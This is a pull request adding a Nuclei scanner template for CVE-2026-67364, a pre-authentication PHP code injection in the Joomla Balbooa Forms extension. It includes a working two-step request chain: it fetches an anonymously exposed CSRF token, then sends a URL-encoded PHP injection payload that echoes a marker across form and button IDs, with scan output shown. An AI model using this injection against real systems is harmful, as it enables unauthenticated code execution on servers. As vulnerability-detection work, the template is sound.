### PR TITLE
Added CVE-2026-67364 template

### DIFF
--- a/http/cves/2026/CVE-2026-67364.yaml
+++ b/http/cves/2026/CVE-2026-67364.yaml
@@ -1,0 +1,98 @@
+id: CVE-2026-67364
+
+info:
+  name: Balbooa Forms < 2.4.3.2 - Pre-auth PHP Code Injection
+  author: Lulztigre
+  severity: critical
+  description: |
+    Joomla Balbooa Forms contains a code injection vulnerability in its custom-PHP
+    post-submission handler. The [URL parameter = X] shortcode is substituted with the
+    raw, unescaped value of a query parameter before the handler is executed via eval(),
+    letting unauthenticated attackers inject arbitrary PHP that executes server-side.
+    The CSRF token guarding the submission endpoint is disclosed anonymously via
+    task=form.getSessionToken, so it provides no real protection. Exploitability requires
+    a form whose submit button has a custom-PHP handler referencing a URL-parameter
+    shortcode, and no reCAPTCHA on the submit button.
+  impact: |
+    Unauthenticated attackers can execute arbitrary PHP code on the server, leading to
+    full remote code execution and complete compromise of the Joomla installation.
+  remediation: |
+    Update to Balbooa Forms 2.4.3.2 or later, which hardens the shortcode substitution
+    path used by the eval() handler.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-67364
+    - https://www.cve.org/CVERecord?id=CVE-2026-67364
+    - https://github.com/Lulztigre/cve-2026-67363-67364
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-67364
+    epss-score: 0.00294
+    epss-percentile: 0.21478
+    cwe-id:
+      - CWE-94
+      - CWE-95
+  metadata:
+    verified: true
+    max-request: 32
+    vendor: balbooa
+    product: forms
+    framework: joomla
+    fofa-query: body="com_baforms"
+  tags: cve,cve2026,joomla,balbooa,baforms,code-injection,rce,vuln,pre-auth
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET /index.php?option=com_baforms&task=form.getSessionToken HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    redirects: true
+    extractors:
+      - type: regex
+        name: token
+        internal: true
+        group: 1
+        regex:
+          - "([a-f0-9]{32})"
+
+  - raw:
+      - |
+        POST /index.php?option=com_baforms&task=form.message&x=%27%3Becho%20%27BFNUCLEI{{randstr}}%27%3B%2F%2F HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        form-id={{form_id}}&submit-btn={{btn_id}}&ba-honeypot=&{{token}}=1
+
+    cookie-reuse: true
+    redirects: true
+    payloads:
+      form_id:
+        - "1"
+        - "2"
+        - "3"
+      btn_id:
+        - "1"
+        - "2"
+        - "3"
+        - "4"
+        - "5"
+        - "6"
+        - "7"
+        - "8"
+        - "9"
+        - "10"
+    attack: clusterbomb
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "BFNUCLEI{{randstr}}"
+      - type: status
+        status:
+          - 200
+    stop-at-first-match: true


### PR DESCRIPTION

  Template for CVE-2026-67364 (Balbooa Forms < 2.4.3.2, pre-auth eval RCE).
  Detection: anonymous CSRF token + echo-marker sweep over form/btn pairs,
  non-destructive (no command execution, no file writes).

 Verified against com_baforms 2.4.3.1 on Joomla 5.4.7 (nuclei v3.11.1):

[CVE-2026-67364] [http] [critical] http://<target>/index.php?option=com_baforms&task=form.message&x=%27%3Becho%20%27BFNUCLEI3IeDRAik6jXAvrbHOQEXa8ABblL%27%3B%2F%2F [btn_id="9",form_id="1"]
  
[INF] Scan completed in 989.1677ms. 1 matches found.